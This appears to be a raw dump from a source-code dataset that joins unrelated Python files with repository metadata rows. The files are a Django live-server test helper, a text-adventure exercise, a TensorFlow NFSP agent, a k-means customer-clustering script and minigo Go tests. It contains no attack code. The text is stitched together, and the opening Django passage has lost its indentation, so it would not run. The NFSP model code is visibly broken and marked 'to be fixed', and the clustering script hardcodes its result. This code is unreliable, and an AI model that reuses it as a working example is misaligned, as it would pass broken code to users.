test_item = test_func
# Retrieve the possibly existing value from the class's dict to
# avoid triggering the descriptor.
skip = test_func.__dict__.get('__unittest_skip__')
if isinstance(skip, CheckCondition):
test_item.__unittest_skip__ = skip.add_condition(condition, reason)
elif skip is not True:
test_item.__unittest_skip__ = CheckCondition((condition, reason))
return test_item
return decorator
def skipIfDBFeature(*features):
"""
Skip a test if a database has at least one of the named features.
"""
return _deferredSkip(
lambda: any(getattr(connection.features, feature, False) for feature in features),
"Database has feature(s) %s" % ", ".join(features)
)
def skipUnlessDBFeature(*features):
"""
Skip a test unless a database has all the named features.
"""
return _deferredSkip(
lambda: not all(getattr(connection.features, feature, False) for feature in features),
"Database doesn't support feature(s): %s" % ", ".join(features)
)
def skipUnlessAnyDBFeature(*features):
"""
Skip a test unless a database has any of the named features.
"""
return _deferredSkip(
lambda: not any(getattr(connection.features, feature, False) for feature in features),
"Database doesn't support any of the feature(s): %s" % ", ".join(features)
)
class QuietWSGIRequestHandler(WSGIRequestHandler):
"""
Just a regular WSGIRequestHandler except it doesn't log to the standard
output any of the requests received, so as to not clutter the output for
the tests' results.
"""
def log_message(*args):
pass
class FSFilesHandler(WSGIHandler):
"""
WSGI middleware that intercepts calls to a directory, as defined by one of
the *_ROOT settings, and serves those files, publishing them under *_URL.
"""
def __init__(self, application):
self.application = application
self.base_url = urlparse(self.get_base_url())
super().__init__()
def _should_handle(self, path):
"""
Checks if the path should be handled. Ignores the path if:
* the host is provided as part of the base_url
* the request's path isn't under the media path (or equal)
"""
return path.startswith(self.base_url[2]) and not self.base_url[1]
def file_path(self, url):
"""
Returns the relative path to the file on disk for the given URL.
"""
relative_url = url[len(self.base_url[2]):]
return url2pathname(relative_url)
def get_response(self, request):
from django.http import Http404
if self._should_handle(request.path):
try:
return self.serve(request)
except Http404:
pass
return super().get_response(request)
def serve(self, request):
os_rel_path = self.file_path(request.path)
os_rel_path = posixpath.normpath(unquote(os_rel_path))
# Emulate behavior of django.contrib.staticfiles.views.serve() when it
# invokes staticfiles' finders functionality.
# TODO: Modify if/when that internal API is refactored
final_rel_path = os_rel_path.replace('\\', '/').lstrip('/')
return serve(request, final_rel_path, document_root=self.get_base_dir())
def __call__(self, environ, start_response):
if not self._should_handle(get_path_info(environ)):
return self.application(environ, start_response)
return super().__call__(environ, start_response)
class _StaticFilesHandler(FSFilesHandler):
"""
Handler for serving static files. A private class that is meant to be used
solely as a convenience by LiveServerThread.
"""
def get_base_dir(self):
return settings.STATIC_ROOT
def get_base_url(self):
return settings.STATIC_URL
class _MediaFilesHandler(FSFilesHandler):
"""
Handler for serving the media files. A private class that is meant to be
used solely as a convenience by LiveServerThread.
"""
def get_base_dir(self):
return settings.MEDIA_ROOT
def get_base_url(self):
return settings.MEDIA_URL
class LiveServerThread(threading.Thread):
"""
Thread for running a live http server while the tests are running.
"""
def __init__(self, host, static_handler, connections_override=None):
self.host = host
self.port = None
self.is_ready = threading.Event()
self.error = None
self.static_handler = static_handler
self.connections_override = connections_override
super().__init__()
def run(self):
"""
Sets up the live server and databases, and then loops over handling
http requests.
"""
if self.connections_override:
# Override this thread's database connections with the ones
# provided by the main thread.
for alias, conn in self.connections_override.items():
connections[alias] = conn
try:
# Create the handler for serving static and media files
handler = self.static_handler(_MediaFilesHandler(WSGIHandler()))
self.httpd = self._create_server(0)
self.port = self.httpd.server_address[1]
self.httpd.set_app(handler)
self.is_ready.set()
self.httpd.serve_forever()
except Exception as e:
self.error = e
self.is_ready.set()
finally:
connections.close_all()
def _create_server(self, port):
return ThreadedWSGIServer((self.host, port), QuietWSGIRequestHandler, allow_reuse_address=False)
def terminate(self):
if hasattr(self, 'httpd'):
# Stop the WSGI server
self.httpd.shutdown()
self.httpd.server_close()
self.join()
class LiveServerTestCase(TransactionTestCase):
"""
Does basically the same as TransactionTestCase but also launches a live
http server in a separate thread so that the tests may use another testing
framework, such as Selenium for example, instead of the built-in dummy
client.
Note that it inherits from TransactionTestCase instead of TestCase because
the threads do not share the same transactions (unless if using in-memory
sqlite) and each thread needs to commit all their transactions so that the
other thread can see the changes.
"""
host = 'localhost'
server_thread_class = LiveServerThread
static_handler = _StaticFilesHandler
@classproperty
def live_server_url(cls):
return 'http://%s:%s' % (cls.host, cls.server_thread.port)
@classmethod
def setUpClass(cls):
super().setUpClass()
connections_override = {}
for conn in connections.all():
# If using in-memory sqlite databases, pass the connections to
# the server thread.
if conn.vendor == 'sqlite' and conn.is_in_memory_db():
# Explicitly enable thread-shareability for this connection
conn.allow_thread_sharing = True
connections_override[conn.alias] = conn
cls._live_server_modified_settings = modify_settings(
ALLOWED_HOSTS={'append': cls.host},
)
cls._live_server_modified_settings.enable()
cls.server_thread = cls._create_server_thread(connections_override)
cls.server_thread.daemon = True
cls.server_thread.start()
# Wait for the live server to be ready
cls.server_thread.is_ready.wait()
if cls.server_thread.error:
# Clean up behind ourselves, since tearDownClass won't get called in
# case of errors.
cls._tearDownClassInternal()
raise cls.server_thread.error
@classmethod
def _create_server_thread(cls, connections_override):
return cls.server_thread_class(
cls.host,
cls.static_handler,
connections_override=connections_override,
)
@classmethod
def _tearDownClassInternal(cls):
# There may not be a 'server_thread' attribute if setUpClass() for some
# reasons has raised an exception.
if hasattr(cls, 'server_thread'):
# Terminate the live server's thread
cls.server_thread.terminate()
# Restore sqlite in-memory database connections' non-shareability
for conn in connections.all():
if conn.vendor == 'sqlite' and conn.is_in_memory_db():
conn.allow_thread_sharing = False
@classmethod
def tearDownClass(cls):
cls._tearDownClassInternal()
cls._live_server_modified_settings.disable()
super().tearDownClass()
class SerializeMixin:
"""
Mixin to enforce serialization of TestCases that share a common resource.
Define a common 'lockfile' for each set of TestCases to serialize. This
file must exist on the filesystem.
Place it early in the MRO in order to isolate setUpClass / tearDownClass.
"""
lockfile = None
@classmethod
def setUpClass(cls):
if cls.lockfile is None:
raise ValueError(
"{}.lockfile isn't set. Set it to a unique value "
"in the base class.".format(cls.__name__))
cls._lockfile = open(cls.lockfile)
locks.lock(cls._lockfile, locks.LOCK_EX)
super().setUpClass()
@classmethod
def tearDownClass(cls):
super().tearDownClass()
cls._lockfile.close()
| 40.328928 | 117 | 0.609307 |
795548c53224910a2941780d1ab785680e574d5e | 1,091 | py | Python | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
] | 2 | 2018-06-25T15:17:43.000Z | 2018-06-25T15:17:48.000Z | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
] | null | null | null | ex31.py | yulwin/python-exercises | 812e28e26845d4578d1294dfdd5f5b3e9de9f0b7 | [
"MIT"
] | null | null | null | print("""You enter a dark room with two doors.
Do you go through door #1 or door #2?""")
door = input("> ")
if door == "1":
print("There's a giant bear here eating a cheese cake.")
print("What do you do?")
print("1. Take the cake.")
print("2. Scream at the bear.")
bear = input("> ")
if bear == "1":
print("The bear eats your face off. Good job!")
elif bear == "2":
print("The bear eats your legs off. Good job!")
else:
print(f"Well, doing {bear} is probably better.")
print("Bear runs away.")
elif door == "2":
print("You stare into the endless abyss at Cthulhu's retina.")
print("1. Blueberries.")
print("2. Yellow jacket clothespins.")
print("3. Understanding revolvers yelling melodies.")
insanity = input("> ")
if insanity == "1" or insanity == "2":
print("Your body survives powered by a mind of jello.")
print("Good job!")
else:
print("The insanity rots your eyes into a pool of muck.")
print("Good job!")
else:
print("You stumble around and fall on a knife and die. Good job!")
| 27.974359 | 70 | 0.612282 |
79554a14e0621cd298c3d25105c04b39ccdea707 | 144 | py | Python | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | Algorithm/Datatype/__init__.py | XuXuClassMate/My_Test_PyProject | 5822455af47f5855d1db4c388c2c973c440a4d3f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author : XuXu ClassMate
# @File : __init__.py.py
# username: xuxudemac
# @IDE: PyCharm
# @Time : 2022/1/18 9:35 上午
| 20.571429 | 27 | 0.611111 |
79554a47383e1c1032fc24018e482de85d7c68f8 | 13,159 | py | Python | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | 1 | 2020-08-27T10:20:26.000Z | 2020-08-27T10:20:26.000Z | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | null | null | null | rlcard/agents/nfsp_agent.py | pmalhaire/rlcard | 19dbd6972c9bf1ace9ee814598e65475dd672fe5 | [
"MIT"
] | null | null | null | # Copyright 2019 DATA Lab at Texas A&M University. All rights reserved.
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Neural Fictitious Self-Play (NFSP) agent implemented in TensorFlow.
See the paper https://arxiv.org/abs/1603.01121 for more details.
'''
import collections
import random
import enum
import numpy as np
import tensorflow as tf
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.utils.utils import remove_illegal
Transition = collections.namedtuple('Transition', 'info_state action_probs')
MODE = enum.Enum('mode', 'best_response average_policy')
class NFSPAgent(object):
''' NFSP Agent implementation in TensorFlow.
'''
def __init__(self,
sess,
scope,
action_num=4,
state_shape=None,
hidden_layers_sizes=None,
reservoir_buffer_capacity=int(1e6),
anticipatory_param=0.1,
batch_size=256,
train_every=1,
rl_learning_rate=0.1,
sl_learning_rate=0.005,
min_buffer_size_to_learn=1000,
q_replay_memory_size=30000,
q_replay_memory_init_size=1000,
q_update_target_estimator_every=1000,
q_discount_factor=0.99,
q_epsilon_start=0.06,
q_epsilon_end=0,
q_epsilon_decay_steps=int(1e6),
q_batch_size=256,
q_train_every=1,
q_mlp_layers=None,
evaluate_with='average_policy'):
''' Initialize the NFSP agent.
Args:
sess (tf.Session): Tensorflow session object.
scope (string): The name scope of NFSPAgent.
action_num (int): The number of actions.
state_shape (list): The shape of the state space.
hidden_layers_sizes (list): The hidden layers sizes for the layers of
the average policy.
reservoir_buffer_capacity (int): The size of the buffer for average policy.
anticipatory_param (float): The hyper-parameter that balances rl/avarage policy.
batch_size (int): The batch_size for training average policy.
train_every (int): Train the SL policy every X steps.
rl_learning_rate (float): The learning rate of the RL agent.
sl_learning_rate (float): the learning rate of the average policy.
min_buffer_size_to_learn (int): The minimum buffer size to learn for average policy.
q_replay_memory_size (int): The memory size of inner DQN agent.
q_replay_memory_init_size (int): The initial memory size of inner DQN agent.
q_update_target_estimator_every (int): The frequency of updating target network for
inner DQN agent.
q_discount_factor (float): The discount factor of inner DQN agent.
q_epsilon_start (float): The starting epsilon of inner DQN agent.
q_epsilon_end (float): the end epsilon of inner DQN agent.
q_epsilon_decay_steps (int): The decay steps of inner DQN agent.
q_batch_size (int): The batch size of inner DQN agent.
q_train_step (int): Train the model every X steps.
q_mlp_layers (list): The layer sizes of inner DQN agent.
evaluate_with (string): The value can be 'best_response' or 'average_policy'
'''
self.use_raw = False
self._sess = sess
self._scope = scope
self._action_num = action_num
self._state_shape = state_shape
self._layer_sizes = hidden_layers_sizes
self._batch_size = batch_size
self._train_every = train_every
self._sl_learning_rate = sl_learning_rate
self._anticipatory_param = anticipatory_param
self._min_buffer_size_to_learn = min_buffer_size_to_learn
self._reservoir_buffer = ReservoirBuffer(reservoir_buffer_capacity)
self._prev_timestep = None
self._prev_action = None
self.evaluate_with = evaluate_with
# Total timesteps
self.total_t = 0
# Step counter to keep track of learning.
self._step_counter = 0
with tf.compat.v1.variable_scope(scope):
# Inner RL agent
self._rl_agent = DQNAgent(sess, scope+'_dqn', q_replay_memory_size, q_replay_memory_init_size, q_update_target_estimator_every, q_discount_factor, q_epsilon_start, q_epsilon_end, q_epsilon_decay_steps, q_batch_size, action_num, state_shape, q_train_every, q_mlp_layers, rl_learning_rate)
with tf.compat.v1.variable_scope('sl'):
# Build supervised model
self._build_model()
self.sample_episode_policy()
def _build_model(self):
''' build the model for supervised learning
'''
# Placeholders.
input_shape = [None]
input_shape.extend(self._state_shape)
self._info_state_ph = tf.compat.v1.placeholder(
shape=input_shape,
dtype=tf.float32)
self._X = tf.keras.layers.Flatten(self._info_state_ph)
# Boolean to indicate whether is training or not
self.is_train = tf.compat.v1.placeholder(tf.bool, name="is_train");
# Batch Normalization
self._X = tf.compat.v1.layers.batch_normalization(self._X, training=True)
self._action_probs_ph = tf.compat.v1.placeholder(
shape=[None, self._action_num], dtype=tf.float32)
# Average policy network.
fc = self._X
# to be fixed
for dim in self._layer_sizes:
fc.add(tf.keras.layers.Dense(dim, activation=tf.tanh))
self._avg_policy = tf.keras.layers.Dense(self._action_num, activation=None)
self._avg_policy_probs = tf.nn.softmax(self._avg_policy)
# Loss
self._loss = tf.reduce_mean(
input_tensor=tf.nn.softmax_cross_entropy_with_logits(
labels=tf.stop_gradient(self._action_probs_ph),
logits=self._avg_policy))
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self._sl_learning_rate, name='nfsp_adam')
update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS, scope=tf.compat.v1.get_variable_scope().name)
with tf.control_dependencies(update_ops):
self._learn_step = optimizer.minimize(self._loss)
def feed(self, ts):
''' Feed data to inner RL agent
Args:
ts (list): A list of 5 elements that represent the transition.
'''
self._rl_agent.feed(ts)
self.total_t += 1
if self.total_t>0 and len(self._reservoir_buffer) >= self._min_buffer_size_to_learn and self.total_t%self._train_every == 0:
sl_loss = self.train_sl()
print('\rINFO - Agent {}, step {}, sl-loss: {}'.format(self._scope, self.total_t, sl_loss), end='')
def step(self, state):
''' Returns the action to be taken.
Args:
state (dict): The current state
Returns:
action (int): An action id
'''
obs = state['obs']
legal_actions = state['legal_actions']
if self._mode == MODE.best_response:
probs = self._rl_agent.predict(obs)
one_hot = np.eye(len(probs))[np.argmax(probs)]
self._add_transition(obs, one_hot)
elif self._mode == MODE.average_policy:
probs = self._act(obs)
probs = remove_illegal(probs, legal_actions)
action = np.random.choice(len(probs), p=probs)
return action
def eval_step(self, state):
''' Use the average policy for evaluation purpose
Args:
state (dict): The current state.
Returns:
action (int): An action id.
probs (list): The list of action probabilies
'''
if self.evaluate_with == 'best_response':
action, probs = self._rl_agent.eval_step(state)
elif self.evaluate_with == 'average_policy':
obs = state['obs']
legal_actions = state['legal_actions']
probs = self._act(obs)
probs = remove_illegal(probs, legal_actions)
action = np.random.choice(len(probs), p=probs)
else:
raise ValueError("'evaluate_with' should be either 'average_policy' or 'best_response'.")
return action, probs
def sample_episode_policy(self):
''' Sample average/best_response policy
'''
if np.random.rand() < self._anticipatory_param:
self._mode = MODE.best_response
else:
self._mode = MODE.average_policy
def _act(self, info_state):
''' Predict action probability givin the observation and legal actions
Args:
info_state (numpy.array): An obervation.
Returns:
action_probs (numpy.array): The predicted action probability.
'''
info_state = np.expand_dims(info_state, axis=0)
action_probs = self._sess.run(
self._avg_policy_probs,
feed_dict={self._info_state_ph: info_state, self.is_train: False})[0]
return action_probs
def _add_transition(self, state, probs):
''' Adds the new transition to the reservoir buffer.
Transitions are in the form (state, probs).
Args:
state (numpy.array): The state.
probs (numpy.array): The probabilities of each action.
'''
transition = Transition(
info_state=state,
action_probs=probs)
self._reservoir_buffer.add(transition)
def train_sl(self):
''' Compute the loss on sampled transitions and perform a avg-network update.
If there are not enough elements in the buffer, no loss is computed and
`None` is returned instead.
Returns:
loss (float): The average loss obtained on this batch of transitions or `None`.
'''
if (len(self._reservoir_buffer) < self._batch_size or
len(self._reservoir_buffer) < self._min_buffer_size_to_learn):
return None
transitions = self._reservoir_buffer.sample(self._batch_size)
info_states = [t.info_state for t in transitions]
action_probs = [t.action_probs for t in transitions]
loss, _ = self._sess.run(
[self._loss, self._learn_step],
feed_dict={
self._info_state_ph: info_states,
self._action_probs_ph: action_probs,
self.is_train: True,
})
return loss
class ReservoirBuffer(object):
''' Allows uniform sampling over a stream of data.
This class supports the storage of arbitrary elements, such as observation
tensors, integer actions, etc.
See https://en.wikipedia.org/wiki/Reservoir_sampling for more details.
'''
def __init__(self, reservoir_buffer_capacity):
''' Initialize the buffer.
'''
self._reservoir_buffer_capacity = reservoir_buffer_capacity
self._data = []
self._add_calls = 0
def add(self, element):
''' Potentially adds `element` to the reservoir buffer.
Args:
element (object): data to be added to the reservoir buffer.
'''
if len(self._data) < self._reservoir_buffer_capacity:
self._data.append(element)
else:
idx = np.random.randint(0, self._add_calls + 1)
if idx < self._reservoir_buffer_capacity:
self._data[idx] = element
self._add_calls += 1
def sample(self, num_samples):
''' Returns `num_samples` uniformly sampled from the buffer.
Args:
num_samples (int): The number of samples to draw.
Returns:
An iterable over `num_samples` random elements of the buffer.
Raises:
ValueError: If there are less than `num_samples` elements in the buffer
'''
if len(self._data) < num_samples:
raise ValueError("{} elements could not be sampled from size {}".format(
num_samples, len(self._data)))
return random.sample(self._data, num_samples)
def clear(self):
''' Clear the buffer
'''
self._data = []
self._add_calls = 0
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
| 38.031792 | 299 | 0.625655 |
79554b390d7a3b62608eb8304b1b186fbb83990a | 10 | py | Python | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | spytest/tests/system/crm/__init__.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | #initfile
| 5 | 9 | 0.8 |
79554c920584ad6440c9edbd506c2ba4ed59bbb3 | 3,160 | py | Python | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | clusters/code.py | anupriya-babbar/ga-learner-dsmp-repo | 6692b827a06bdb6e246c1df4f2f036d8c9c9a06c | [
"MIT"
] | null | null | null | # --------------
# import packages
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# Load Offers
offers=pd.read_excel(path,sheet_name=0)
# Load Transactions
list1=[]
transactions=pd.read_excel(path,sheet_name=1)
for i in range(0,len(transactions)):
list1.append(1)
transactions['n']=list1
# Merge dataframes
#df=pd.concat([offers,transactions],1)
df=pd.merge(offers,transactions, on='Offer #', how='outer')
# Look at the first 5 rows
df.head()
# --------------
# Code starts here
# create pivot table
matrix=df.pivot_table(index='Customer Last Name',columns='Offer #',values='n')
# replace missing values with 0
matrix.fillna(0,inplace=True)
# reindex pivot table
matrix.reset_index(inplace=True)
# display first 5 rows
matrix.head()
# Code ends here
# --------------
# import packages
from sklearn.cluster import KMeans
# Code starts here
# initialize KMeans object
cluster=KMeans(n_clusters=5,init='k-means++',max_iter=300,n_init=10,random_state=0)
# create 'cluster' column
x=cluster.fit_predict(matrix[matrix.columns[1:]])
matrix['cluster']=x
matrix.head()
# Code ends here
# --------------
# import packages
from sklearn.decomposition import PCA
# Code starts here
# initialize pca object with 2 components
pca=PCA(n_components=2, random_state=0)
# create 'x' and 'y' columns donoting observation locations in decomposed form
x=pca.fit_transform(matrix[matrix.columns[1:]])
y=pca.fit_transform(matrix[matrix.columns[1:]])
matrix['x']=x[:,0]
matrix['y']=y[:,1]
# dataframe to visualize clusters by customer names
clusters=matrix[['Customer Last Name','cluster','x','y']].copy()
# visualize clusters
#matrix.columns
#plt.scatter(x='x', y='y', c='cluster', colormap='viridis')
plt.show()
# Code ends here
# --------------
# Code starts here
# merge 'clusters' and 'transactions'
data=pd.merge(clusters,transactions,on='Customer Last Name')
# merge `data` and `offers`
data=pd.merge(offers,data)
# initialzie empty dictionary
champagne={}
counts=[]
# iterate over every cluster
for i in range(0,5):
# observation falls in that cluster
new_df=data[data['cluster']==i]
# sort cluster according to type of 'Varietal'
counts=new_df['cluster'].value_counts(ascending=False)
x={i:counts}
champagne.update(x)
# check if 'Champagne' is ordered mostly
#if counts.index[0]=='Champagne':
#champagne={i:counts[0]}
cluster_champgane=2
# add it to 'champagne'
#print(data['cluster'].value_counts())
# get cluster with maximum orders of 'Champagne'
print(champagne)
# print out cluster number
# --------------
# Code starts here
# empty dictionary
discount={}
# iterate over cluster numbers
for i in range(0,5):
# dataframe for every cluster
new_df=data[data['cluster']==i]
# average discount for cluster
sum1=new_df['Discount (%)'].sum()
counts=(sum1/len( new_df))
# adding cluster number as key and average discount as value
x={i:counts}
discount.update(x)
# cluster with maximum average discount
print(discount)
cluster_discount= max(discount, key=discount.get)
#cluster_discount
# Code ends here
| 21.496599 | 83 | 0.701582 |
79554cac863aab203935f8da248afca58b716bcf | 23,125 | py | Python | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | tests/test_go.py | awesome-archive/minigo | 188fb197fdafbe9664a32142373b1cbd1459bc67 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import unittest
from coords import parse_kgs_coords as parse_kgs_coords, parse_sgf_coords, unflatten_coords
import coords
from go import Position, PlayerMove, LibertyTracker, WHITE, BLACK, EMPTY
import go
import sgf_wrapper
from tests import test_utils
EMPTY_ROW = '.' * go.N + '\n'
TEST_BOARD = test_utils.load_board('''
.X.....OO
X........
''' + EMPTY_ROW * 7)
NO_HANDICAP_SGF = "(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]HA[0]RE[W+1.5]GM[1];B[fd];W[cf];B[eg];W[dd];B[dc];W[cc];B[de];W[cd];B[ed];W[he];B[ce];W[be];B[df];W[bf];B[hd];W[ge];B[gd];W[gg];B[db];W[cb];B[cg];W[bg];B[gh];W[fh];B[hh];W[fg];B[eh];W[ei];B[di];W[fi];B[hg];W[dh];B[ch];W[ci];B[bh];W[ff];B[fe];W[hf];B[id];W[bi];B[ah];W[ef];B[dg];W[ee];B[di];W[ig];B[ai];W[ih];B[fb];W[hi];B[ag];W[ab];B[bd];W[bc];B[ae];W[ad];B[af];W[bd];B[ca];W[ba];B[da];W[ie])"
def parse_kgs_coords_set(string):
return frozenset(map(parse_kgs_coords, string.split()))
class TestBasicFunctions(test_utils.MiniGoUnitTest):
def test_load_board(self):
self.assertEqualNPArray(go.EMPTY_BOARD, np.zeros([go.N, go.N]))
self.assertEqualNPArray(go.EMPTY_BOARD, test_utils.load_board('. \n' * go.N ** 2))
def test_neighbors(self):
corner = parse_kgs_coords('A1')
neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[corner]]
self.assertEqual(len(neighbors), 2)
side = parse_kgs_coords('A2')
side_neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[side]]
self.assertEqual(len(side_neighbors), 3)
def test_is_koish(self):
self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('A9')), BLACK)
self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('B8')), None)
self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('B9')), None)
self.assertEqual(go.is_koish(TEST_BOARD, parse_kgs_coords('E5')), None)
def test_is_eyeish(self):
board = test_utils.load_board('''
.XX...XXX
X.X...X.X
XX.....X.
........X
XXXX.....
OOOX....O
X.OXX.OO.
.XO.X.O.O
XXO.X.OO.
''')
B_eyes = parse_kgs_coords_set('A2 A9 B8 J7 H8')
W_eyes = parse_kgs_coords_set('H2 J1 J3')
not_eyes = parse_kgs_coords_set('B3 E5')
for be in B_eyes:
self.assertEqual(go.is_eyeish(board, be), BLACK, str(be))
for we in W_eyes:
self.assertEqual(go.is_eyeish(board, we), WHITE, str(we))
for ne in not_eyes:
self.assertEqual(go.is_eyeish(board, ne), None, str(ne))
class TestLibertyTracker(test_utils.MiniGoUnitTest):
def test_lib_tracker_init(self):
board = test_utils.load_board('X........' + EMPTY_ROW * 8)
lib_tracker = LibertyTracker.from_board(board)
self.assertEqual(len(lib_tracker.groups), 1)
self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 2)
sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9'))
self.assertEqual(sole_group.liberties, parse_kgs_coords_set('B9 A8'))
self.assertEqual(sole_group.color, BLACK)
def test_place_stone(self):
board = test_utils.load_board('X........' + EMPTY_ROW * 8)
lib_tracker = LibertyTracker.from_board(board)
lib_tracker.add_stone(BLACK, parse_kgs_coords('B9'))
self.assertEqual(len(lib_tracker.groups), 1)
self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 3)
self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('B9')], 3)
sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9 B9'))
self.assertEqual(sole_group.liberties, parse_kgs_coords_set('C9 A8 B8'))
self.assertEqual(sole_group.color, BLACK)
def test_place_stone_opposite_color(self):
board = test_utils.load_board('X........' + EMPTY_ROW * 8)
lib_tracker = LibertyTracker.from_board(board)
lib_tracker.add_stone(WHITE, parse_kgs_coords('B9'))
self.assertEqual(len(lib_tracker.groups), 2)
self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('B9')], go.MISSING_GROUP_ID)
self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 1)
self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('B9')], 2)
black_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
white_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B9')]]
self.assertEqual(black_group.stones, parse_kgs_coords_set('A9'))
self.assertEqual(black_group.liberties, parse_kgs_coords_set('A8'))
self.assertEqual(black_group.color, BLACK)
self.assertEqual(white_group.stones, parse_kgs_coords_set('B9'))
self.assertEqual(white_group.liberties, parse_kgs_coords_set('C9 B8'))
self.assertEqual(white_group.color, WHITE)
def test_merge_multiple_groups(self):
board = test_utils.load_board('''
.X.......
X.X......
.X.......
''' + EMPTY_ROW * 6)
lib_tracker = LibertyTracker.from_board(board)
lib_tracker.add_stone(BLACK, parse_kgs_coords('B8'))
self.assertEqual(len(lib_tracker.groups), 1)
self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B8')]]
self.assertEqual(sole_group.stones, parse_kgs_coords_set('B9 A8 B8 C8 B7'))
self.assertEqual(sole_group.liberties, parse_kgs_coords_set('A9 C9 D8 A7 C7 B6'))
self.assertEqual(sole_group.color, BLACK)
liberty_cache = lib_tracker.liberty_cache
for stone in sole_group.stones:
self.assertEqual(liberty_cache[stone], 6, str(stone))
def test_capture_stone(self):
board = test_utils.load_board('''
.X.......
XO.......
.X.......
''' + EMPTY_ROW * 6)
lib_tracker = LibertyTracker.from_board(board)
captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('C8'))
self.assertEqual(len(lib_tracker.groups), 4)
self.assertEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
self.assertEqual(captured, parse_kgs_coords_set('B8'))
def test_capture_many(self):
board = test_utils.load_board('''
.XX......
XOO......
.XX......
''' + EMPTY_ROW * 6)
lib_tracker = LibertyTracker.from_board(board)
captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('D8'))
self.assertEqual(len(lib_tracker.groups), 4)
self.assertEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
self.assertEqual(captured, parse_kgs_coords_set('B8 C8'))
left_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A8')]]
self.assertEqual(left_group.stones, parse_kgs_coords_set('A8'))
